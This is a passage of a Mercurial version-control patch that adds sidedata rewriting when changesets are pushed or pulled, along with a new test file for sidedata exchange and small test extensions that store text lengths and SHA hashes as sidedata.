import weakref @@ -252,7 +253,7 @@ pos = next yield closechunk() - def _unpackmanifests(self, repo, revmap, trp, prog): + def _unpackmanifests(self, repo, revmap, trp, prog, addrevisioncb=None): self.callback = prog.increment # no need to check for empty manifest group here: # if the result of the merge of 1 and 2 is the same in 3 and 4, @@ -260,7 +261,8 @@ # be empty during the pull self.manifestheader() deltas = self.deltaiter() - repo.manifestlog.getstorage(b'').addgroup(deltas, revmap, trp) + storage = repo.manifestlog.getstorage(b'') + storage.addgroup(deltas, revmap, trp, addrevisioncb=addrevisioncb) prog.complete() self.callback = None @@ -369,6 +371,13 @@ efilesset = None self.callback = None + # Keep track of the (non-changelog) revlogs we've updated and their + # range of new revisions for sidedata rewrite. + # TODO do something more efficient than keeping the reference to + # the revlogs, especially memory-wise. + touched_manifests = {} + touched_filelogs = {} + # pull off the manifest group repo.ui.status(_(b"adding manifests\n")) # We know that we'll never have more manifests than we had @@ -376,7 +385,24 @@ progress = repo.ui.makeprogress( _(b'manifests'), unit=_(b'chunks'), total=changesets ) - self._unpackmanifests(repo, revmap, trp, progress) + on_manifest_rev = None + if sidedata_helpers and b'manifest' in sidedata_helpers[1]: + + def on_manifest_rev(manifest, rev): + range = touched_manifests.get(manifest) + if not range: + touched_manifests[manifest] = (rev, rev) + else: + assert rev == range[1] + 1 + touched_manifests[manifest] = (range[0], rev) + + self._unpackmanifests( + repo, + revmap, + trp, + progress, + addrevisioncb=on_manifest_rev, + ) needfiles = {} if repo.ui.configbool(b'server', b'validate'): @@ -390,12 +416,37 @@ for f, n in pycompat.iteritems(mfest): needfiles.setdefault(f, set()).add(n) + on_filelog_rev = None + if sidedata_helpers and b'filelog' in sidedata_helpers[1]: + + def on_filelog_rev(filelog, rev): + range = touched_filelogs.get(filelog) + if not range: + touched_filelogs[filelog] = (rev, rev) + else: + assert rev == range[1] + 1 + touched_filelogs[filelog] = (range[0], rev) + # process the files repo.ui.status(_(b"adding file changes\n")) newrevs, newfiles = _addchangegroupfiles( - repo, self, revmap, trp, efiles, needfiles + repo, + self, + revmap, + trp, + efiles, + needfiles, + addrevisioncb=on_filelog_rev, ) + if sidedata_helpers: + if b'changelog' in sidedata_helpers[1]: + cl.rewrite_sidedata(sidedata_helpers, clstart, clend - 1) + for mf, (startrev, endrev) in touched_manifests.items(): + mf.rewrite_sidedata(sidedata_helpers, startrev, endrev) + for fl, (startrev, endrev) in touched_filelogs.items(): + fl.rewrite_sidedata(sidedata_helpers, startrev, endrev) + # making sure the value exists tr.changes.setdefault(b'changegroup-count-changesets', 0) tr.changes.setdefault(b'changegroup-count-revisions', 0) @@ -559,14 +610,18 @@ node, p1, p2, deltabase, cs, flags = headertuple return node, p1, p2, deltabase, cs, flags - def _unpackmanifests(self, repo, revmap, trp, prog): - super(cg3unpacker, self)._unpackmanifests(repo, revmap, trp, prog) + def _unpackmanifests(self, repo, revmap, trp, prog, addrevisioncb=None): + super(cg3unpacker, self)._unpackmanifests( + repo, revmap, trp, prog, addrevisioncb=addrevisioncb + ) for chunkdata in iter(self.filelogheader, {}): # If we get here, there are directory manifests in the changegroup d = chunkdata[b"filename"] repo.ui.debug(b"adding %s revisions\n" % d) deltas = self.deltaiter() - if not repo.manifestlog.getstorage(d).addgroup(deltas, revmap, trp): + if not repo.manifestlog.getstorage(d).addgroup( + deltas, revmap, trp, addrevisioncb=addrevisioncb + ): raise error.Abort(_(b"received dir revlog group is empty")) @@ -1793,7 +1848,15 @@ return bundler.generate(commonrevs, csets, fastpathlinkrev, source) -def _addchangegroupfiles(repo, source, revmap, trp, expectedfiles, needfiles): +def _addchangegroupfiles( + repo, + source, + revmap, + trp, + expectedfiles, + needfiles, + addrevisioncb=None, +): revisions = 0 files = 0 progress = repo.ui.makeprogress( @@ -1808,7 +1871,13 @@ o = len(fl) try: deltas = source.deltaiter() - if not fl.addgroup(deltas, revmap, trp): + added = fl.addgroup( + deltas, + revmap, + trp, + addrevisioncb=addrevisioncb, + ) + if not added: raise error.Abort(_(b"received file revlog group is empty")) except error.CensoredBaseError as e: raise error.Abort(_(b"received delta base is censored: %s") % e) diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -3205,3 +3205,54 @@ ) return d + + def rewrite_sidedata(self, helpers, startrev, endrev): + if self.version & 0xFFFF != REVLOGV2: + return + # inline are not yet supported because they suffer from an issue when + # rewriting them (since it's not an append-only operation). + # See issue6485. + assert not self._inline + if not helpers[1] and not helpers[2]: + # Nothing to generate or remove + return + + new_entries = [] + # append the new sidedata + with self._datafp(b'a+') as fp: + # Maybe this bug still exists, see revlog._writeentry + fp.seek(0, os.SEEK_END) + current_offset = fp.tell() + for rev in range(startrev, endrev + 1): + entry = self.index[rev] + new_sidedata = storageutil.run_sidedata_helpers( + store=self, + sidedata_helpers=helpers, + sidedata={}, + rev=rev, + ) + + serialized_sidedata = sidedatautil.serialize_sidedata( + new_sidedata + ) + if entry[8] != 0 or entry[9] != 0: + # rewriting entries that already have sidedata is not + # supported yet, because it introduces garbage data in the + # revlog. + msg = "Rewriting existing sidedata is not supported yet" + raise error.Abort(msg) + entry = entry[:8] + entry += (current_offset, len(serialized_sidedata)) + + fp.write(serialized_sidedata) + new_entries.append(entry) + current_offset += len(serialized_sidedata) + + # rewrite the new index entries + with self._indexfp(b'w+') as fp: + fp.seek(startrev * self._io.size) + for i, entry in enumerate(new_entries): + rev = startrev + i + self.index.replace_sidedata_info(rev, entry[8], entry[9]) + packed = self._io.packentry(entry, self.node, self.version, rev) + fp.write(packed) diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -271,13 +271,12 @@ $ hg ci --amend -m 'copy a to j, v2' saved backup bundle to $TESTTMP/repo/.hg/strip-backup/*-*-amend.hg (glob) $ hg debugsidedata -c -v -- -1 - 1 sidedata entries (missing-correct-output !) - entry-0014 size 24 (missing-correct-output !) - '\x00\x00\x00\x02\x00\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00aj' (missing-correct-output !) + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x00\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00aj' #endif $ hg showcopies --config experimental.copies.read-from=filelog-only - a -> j (sidedata missing-correct-output !) - a -> j (no-sidedata !) + a -> j The entries should be written to extras even if they're empty (so the client won't have to fall back to reading from filelogs) $ echo x >> j @@ -355,8 +354,7 @@ saved backup bundle to $TESTTMP/rebase-rename/.hg/strip-backup/*-*-rebase.hg (glob) $ hg st --change . --copies A b - a (sidedata missing-correct-output !) - a (no-sidedata !) + a R a $ cd .. diff --git a/tests/test-sidedata-exchange.t b/tests/test-sidedata-exchange.t new file mode 100644 --- /dev/null +++ b/tests/test-sidedata-exchange.t @@ -0,0 +1,473 @@ +=========================== +Tests for sidedata exchange +=========================== + +Check simple exchange behavior +============================== + +Pusher and pushed have sidedata enabled +--------------------------------------- + + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-target/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg push -r . ../sidedata-target + pushing to ../sidedata-target + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + $ hg -R ../sidedata-target debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00:' + entry-0002 size 32 + '\xa3\xee4v\x99\x85$\x9f\x1f\x8dKe\x0f\xc3\x9d-\xc9\xb5%[\x15=h\xe9\xf2O\xb5\xd9\x1f*\xff\xe5' + $ hg -R ../sidedata-target debugsidedata -m 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x81' + entry-0002 size 32 + '-bL\xc5\xa4uu"#\xac\x1b`,\xc0\xbc\x9d\xf5\xac\xf0\x1d\x89)2\xf8N\xb1\x14m\xce\xd7\xbc\xae' + $ hg -R ../sidedata-target debugsidedata a 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata a 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x03' + entry-0002 size 32 + '\xd9\xcd\x81UvL5C\xf1\x0f\xad\x8aH\rt17Fo\x8dU!<\x8e\xae\xfc\xd1/\x06\xd4:\x80' + $ cd .. + +Puller and pulled have sidedata enabled +--------------------------------------- + + $ rm -rf sidedata-source sidedata-target + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-target/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg pull -R ../sidedata-target ../sidedata-source + pulling from ../sidedata-source + requesting all changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + new changesets 05da661850d7:7ec8b4049447 + (run 'hg update' to get a working copy) + $ hg -R ../sidedata-target debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00:' + entry-0002 size 32 + '\xa3\xee4v\x99\x85$\x9f\x1f\x8dKe\x0f\xc3\x9d-\xc9\xb5%[\x15=h\xe9\xf2O\xb5\xd9\x1f*\xff\xe5' + $ hg -R ../sidedata-target debugsidedata -m 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x81' + entry-0002 size 32 + '-bL\xc5\xa4uu"#\xac\x1b`,\xc0\xbc\x9d\xf5\xac\xf0\x1d\x89)2\xf8N\xb1\x14m\xce\xd7\xbc\xae' + $ hg -R ../sidedata-target debugsidedata a 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata a 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x03' + entry-0002 size 32 + '\xd9\xcd\x81UvL5C\xf1\x0f\xad\x8aH\rt17Fo\x8dU!<\x8e\xae\xfc\xd1/\x06\xd4:\x80' + $ cd .. + +Now on to asymmetric configs. + +Pusher has sidedata enabled, pushed does not +-------------------------------------------- + + $ rm -rf sidedata-source sidedata-target + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=no + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg push -r . ../sidedata-target --traceback + pushing to ../sidedata-target + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + $ hg -R ../sidedata-target log -G + o changeset: 1:7ec8b4049447 + | tag: tip + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: other + | + o changeset: 0:05da661850d7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: initial + + + $ hg -R ../sidedata-target debugsidedata -c 0 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + $ hg -R ../sidedata-target debugsidedata -m 0 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + $ hg -R ../sidedata-target debugsidedata a 0 + $ hg -R ../sidedata-target debugsidedata a 1 -v + $ cd .. + +Pulled has sidedata enabled, puller does not +-------------------------------------------- + + $ rm -rf sidedata-source sidedata-target + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=no + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg pull -R ../sidedata-target ../sidedata-source + pulling from ../sidedata-source + requesting all changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + new changesets 05da661850d7:7ec8b4049447 + (run 'hg update' to get a working copy) + $ hg -R ../sidedata-target log -G + o changeset: 1:7ec8b4049447 + | tag: tip + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: other + | + o changeset: 0:05da661850d7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: initial + + + $ hg -R ../sidedata-target debugsidedata -c 0 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + $ hg -R ../sidedata-target debugsidedata -m 0 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + $ hg -R ../sidedata-target debugsidedata a 0 + $ hg -R ../sidedata-target debugsidedata a 1 -v + $ cd .. + + +Check sidedata exchange with on-the-fly generation and removal +============================================================== + +(Push) Target has strict superset of the source +----------------------------------------------- + + $ hg init source-repo --config format.exp-use-side-data=yes + $ hg init target-repo --config format.exp-use-side-data=yes + $ cat << EOF >> target-repo/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata.py + > EOF + $ cd source-repo + $ echo aaa > a + $ hg add a + $ hg commit -m a + $ echo aaa > b + $ hg add b + $ hg commit -m b + $ echo xxx >> a + $ hg commit -m aa + +No sidedata is generated in the source + $ hg debugsidedata -c 0 + +Check that sidedata capabilities are advertised + $ hg debugcapabilities ../target-repo | grep sidedata + exp-wanted-sidedata=1,2 + +We expect the client to abort the push since it's not capable of generating +what the server is asking + $ hg push -r . ../target-repo + pushing to ../target-repo + abort: cannot push: required sidedata category not supported by this client: '1' + [255] + +Add the required capabilities + $ cat << EOF >> .hg/hgrc + > [extensions] + > testsidedata2=$TESTDIR/testlib/ext-sidedata-2.py + > EOF + +We expect the target to have sidedata that was generated by the source on push + $ hg push -r . ../target-repo + pushing to ../target-repo + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 2 files + $ cd ../target-repo + $ hg debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x006' + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + $ hg debugsidedata -m 2 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ cd .. + +(Push) Difference is not subset/superset +---------------------------------------- + +Source has one in common, one missing and one more sidedata category with the +target. + + $ rm -rf source-repo target-repo + $ hg init source-repo --config format.exp-use-side-data=yes + $ cat << EOF >> source-repo/.hg/hgrc + > [extensions] + > testsidedata3=$TESTDIR/testlib/ext-sidedata-3.py + > EOF + $ hg init target-repo --config format.exp-use-side-data=yes + $ cat << EOF >> target-repo/.hg/hgrc + > [extensions] + > testsidedata4=$TESTDIR/testlib/ext-sidedata-4.py + > EOF + $ cd source-repo + $ echo aaa > a + $ hg add a + $ hg commit -m a + $ echo aaa > b + $ hg add b + $ hg commit -m b + $ echo xxx >> a + $ hg commit -m aa + +Check that sidedata capabilities are advertised + $ hg debugcapabilities . | grep sidedata + exp-wanted-sidedata=1,2 + $ hg debugcapabilities ../target-repo | grep sidedata + exp-wanted-sidedata=2,3 + +Sidedata is generated in the source, but only the right categories (entry-0001 and entry-0002) + $ hg debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x006' + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + $ hg debugsidedata -m 2 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + + +We expect the target to have sidedata that was generated by the source on push, +and also removed the sidedata categories that are not supported by the target. +Namely, we expect entry-0002 (only exchanged) and entry-0003 (generated), +but not entry-0001. + + $ hg push -r . ../target-repo --traceback + pushing to ../target-repo + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 2 files + $ cd ../target-repo + $ hg log -G + o changeset: 2:40f977031323 + | tag: tip + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: aa + | + o changeset: 1:2707720c6597 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: b + | + o changeset: 0:7049e48789d7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: a + + $ hg debugsidedata -c 0 + 2 sidedata entries + entry-0002 size 32 + entry-0003 size 48 + $ hg debugsidedata -c 1 -v + 2 sidedata entries + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + entry-0003 size 48 + '\x87\xcf\xdfI/\xb5\xed\xeaC\xc1\xf0S\xf3X\x1c\xcc\x00m\xee\xe6#\xc1\xe3\xcaB8Fk\x82e\xfc\xc01\xf6\xb7\xb9\xb3([\xf6D\xa6\xcf\x9b\xea\x11{\x08' + $ hg debugsidedata -m 2 + 2 sidedata entries + entry-0002 size 32 + entry-0003 size 48 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0002 size 32 + entry-0003 size 48 + $ cd .. + +(Pull) Target has strict superset of the source +----------------------------------------------- + + $ rm -rf source-repo target-repo + $ hg init source-repo --config format.exp-use-side-data=yes + $ hg init target-repo --config format.exp-use-side-data=yes + $ cat << EOF >> target-repo/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata.py + > EOF + $ cd source-repo + $ echo aaa > a + $ hg add a + $ hg commit -m a + $ echo aaa > b + $ hg add b + $ hg commit -m b + $ echo xxx >> a + $ hg commit -m aa + +No sidedata is generated in the source + $ hg debugsidedata -c 0 + +Check that sidedata capabilities are advertised + $ hg debugcapabilities ../target-repo | grep sidedata + exp-wanted-sidedata=1,2 + + $ cd ../target-repo + +Add the required capabilities + $ cat << EOF >> .hg/hgrc + > [extensions] + > testsidedata2=$TESTDIR/testlib/ext-sidedata-2.py + > EOF + +We expect the target to have sidedata that it generated on-the-fly during pull + $ hg pull -r . ../source-repo --traceback + pulling from ../source-repo + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 2 files + new changesets 7049e48789d7:40f977031323 + (run 'hg update' to get a working copy) + $ hg debugsidedata -c 0 --traceback + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata -c 1 -v --traceback + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x006' + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + $ hg debugsidedata -m 2 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ cd .. diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata-2.py copy from tests/testlib/ext-sidedata.py copy to tests/testlib/ext-sidedata-2.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata-2.py @@ -1,6 +1,9 @@ -# ext-sidedata.py - small extension to test the sidedata logic +# coding: utf8 +# ext-sidedata-2.py - small extension to test (differently) the sidedata logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Simulates a client for a complex sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -10,79 +13,38 @@ import hashlib import struct -from mercurial.node import ( - nullid, - nullrev, -) -from mercurial import ( - extensions, - requirements, - revlog, -) - -from mercurial.upgrade_utils import engine as upgrade_engine - -from mercurial.revlogutils import sidedata +from mercurial.revlogutils import sidedata as sidedatamod -def wrapaddrevision( - orig, self, text, transaction, link, p1, p2, *args, **kwargs -): - if kwargs.get('sidedata') is None: - kwargs['sidedata'] = {} - sd = kwargs['sidedata'] - ## let's store some arbitrary data just for testing - # text length - sd[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - sd[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return orig(self, text, transaction, link, p1, p2, *args, **kwargs) +def compute_sidedata_1(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + return sidedata -def wrap_revisiondata(orig, self, nodeorrev, *args, **kwargs): - text, sd = orig(self, nodeorrev, *args, **kwargs) - if getattr(self, 'sidedatanocheck', False): - return text, sd - if self.version & 0xFFFF != 2: - return text, sd - if nodeorrev != nullrev and nodeorrev != nullid: - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: - raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] - got = hashlib.sha256(text).digest() - if got != expected: - raise RuntimeError('sha256 mismatch') - return text, sd +def compute_sidedata_2(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha256 = hashlib.sha256(text).digest() + sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return sidedata -def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): - sidedatacompanion = orig(srcrepo, dstrepo) - addedreqs = dstrepo.requirements - srcrepo.requirements - if requirements.SIDEDATA_REQUIREMENT in addedreqs: - assert sidedatacompanion is None # deal with composition later - - def sidedatacompanion(revlog, rev): - update = {} - revlog.sidedatanocheck = True - try: - text = revlog.revision(rev) - finally: - del revlog.sidedatanocheck - ## let's store some arbitrary data just for testing - # text length - update[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - update[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return False, (), update, 0, 0 - - return sidedatacompanion - - -def extsetup(ui): - extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, '_revisiondata', wrap_revisiondata) - extensions.wrapfunction( - upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion - ) +def reposetup(ui, repo): + # Sidedata keys happen to be the same as the categories, easier for testing. + for kind in (b'changelog', b'manifest', b'filelog'): + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST1, + (sidedatamod.SD_TEST1,), + compute_sidedata_1, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST2, + (sidedatamod.SD_TEST2,), + compute_sidedata_2, + ) diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata-3.py copy from tests/testlib/ext-sidedata.py copy to tests/testlib/ext-sidedata-3.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata-3.py @@ -1,6 +1,10 @@ -# ext-sidedata.py - small extension to test the sidedata logic +# coding: utf8 +# ext-sidedata-3.py - small extension to test (differently still) the sidedata +# logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Simulates a client for a complex sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -10,19 +14,38 @@ import hashlib import struct -from mercurial.node import ( - nullid, - nullrev, -) from mercurial import ( extensions, - requirements, revlog, ) -from mercurial.upgrade_utils import engine as upgrade_engine +from mercurial.revlogutils import sidedata as sidedatamod + + +def compute_sidedata_1(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + return sidedata + -from mercurial.revlogutils import sidedata +def compute_sidedata_2(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha256 = hashlib.sha256(text).digest() + sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return sidedata + + +def compute_sidedata_3(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha384 = hashlib.sha384(text).digest() + sidedata[sidedatamod.SD_TEST3] = struct.pack('>48s', sha384) + return sidedata def wrapaddrevision( @@ -31,58 +54,35 @@ if kwargs.get('sidedata') is None: kwargs['sidedata'] = {} sd = kwargs['sidedata'] - ## let's store some arbitrary data just for testing - # text length - sd[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - sd[sidedata.SD_TEST2] = struct.pack('>32s', sha256) + sd = compute_sidedata_1(None, self, None, sd, text=text) + kwargs['sidedata'] = compute_sidedata_2(None, self, None, sd, text=text) return orig(self, text, transaction, link, p1, p2, *args, **kwargs) -def wrap_revisiondata(orig, self, nodeorrev, *args, **kwargs): - text, sd = orig(self, nodeorrev, *args, **kwargs) - if getattr(self, 'sidedatanocheck', False): - return text, sd - if self.version & 0xFFFF != 2: - return text, sd - if nodeorrev != nullrev and nodeorrev != nullid: - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: - raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] - got = hashlib.sha256(text).digest() - if got != expected: - raise RuntimeError('sha256 mismatch') - return text, sd - - -def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): - sidedatacompanion = orig(srcrepo, dstrepo) - addedreqs = dstrepo.requirements - srcrepo.requirements - if requirements.SIDEDATA_REQUIREMENT in addedreqs: - assert sidedatacompanion is None # deal with composition later - - def sidedatacompanion(revlog, rev): - update = {} - revlog.sidedatanocheck = True - try: - text = revlog.revision(rev) - finally: - del revlog.sidedatanocheck - ## let's store some arbitrary data just for testing - # text length - update[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - update[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return False, (), update, 0, 0 - - return sidedatacompanion - - def extsetup(ui): extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, '_revisiondata', wrap_revisiondata) - extensions.wrapfunction( - upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion - ) + + +def reposetup(ui, repo): + # Sidedata keys happen to be the same as the categories, easier for testing. + for kind in (b'changelog', b'manifest', b'filelog'): + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST1, + (sidedatamod.SD_TEST1,), + compute_sidedata_1, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST2, + (sidedatamod.SD_TEST2,), + compute_sidedata_2, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST3, + (sidedatamod.SD_TEST3,), + compute_sidedata_3, + ) + repo.register_wanted_sidedata(sidedatamod.SD_TEST1) + repo.register_wanted_sidedata(sidedatamod.SD_TEST2) diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata-4.py copy from tests/testlib/ext-sidedata.py copy to tests/testlib/ext-sidedata-4.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata-4.py @@ -1,88 +1,19 @@ -# ext-sidedata.py - small extension to test the sidedata logic +# coding: utf8 +# ext-sidedata-4.py - small extension to test (differently still) the sidedata +# logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Simulates a server for a complex sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. from __future__ import absolute_import -import hashlib -import struct - -from mercurial.node import ( - nullid, - nullrev, -) -from mercurial import ( - extensions, - requirements, - revlog, -) - -from mercurial.upgrade_utils import engine as upgrade_engine - from mercurial.revlogutils import sidedata -def wrapaddrevision( - orig, self, text, transaction, link, p1, p2, *args, **kwargs -): - if kwargs.get('sidedata') is None: - kwargs['sidedata'] = {} - sd = kwargs['sidedata'] - ## let's store some arbitrary data just for testing - # text length - sd[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - sd[sidedata.SD_TEST2] = struct.pack('>32s', sha256) 